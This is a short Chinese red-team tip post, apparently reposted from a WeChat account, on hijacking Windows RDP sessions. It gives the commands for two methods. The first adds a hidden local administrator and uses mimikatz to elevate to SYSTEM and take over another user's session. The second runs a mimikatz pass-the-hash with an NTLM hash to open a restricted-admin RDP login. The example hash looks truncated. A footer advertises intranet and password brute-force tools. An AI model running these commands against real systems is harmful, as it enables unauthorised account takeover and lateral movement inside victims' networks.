红队技巧|关于RDP劫持小技巧
2022-12-12 08:31:2 Author: 菜鸟学信安(查看原文) 阅读量:11 收藏

一、劫持方式1:

创建用户:

net user test 123.com /add net localgroup administrators test /add

登录后,使用mimikatz工具

privilege::debug #提权 
ts::sessions #查看当前主机的会话
token::elevate #提升本地管理员权限为system
ts::remote /id:1 #劫持id为1的会话

二、劫持方式2:

mimikatz命令如下:

privilege::debug 
sekurlsa::pth /user:9821 /domain:DESKTOP-6RVIHJ2 /ntlm:e5df2c988f0d77ef35a9bdc95b5 "/run:mstsc.exe /restrictedadmin"

执行后弹出远程登录界面,选择连接,成功实现远程登录

————————————————

作者:Adminxe
原文链接:https://blog.csdn.net/Adminxe/article/details/124197551
关注公众号后台回复数字 1126 获取 应急响应实战笔记,1127 - ctf工具集合,1230 - 内网工具,3924 - 弱口令爆破工具。

文章来源: http://mp.weixin.qq.com/s?__biz=MzU2NzY5MzI5Ng==&mid=2247494097&idx=1&sn=38082bbcf36b2e1ddd94623980e19f63&chksm=fc9bf34ecbec7a58c6b7e7f75afb53fa3340c055cc177eb59c880f5b4c3b28e81d199c2d2ec9#rd
如有侵权请联系:admin#unsafe.sh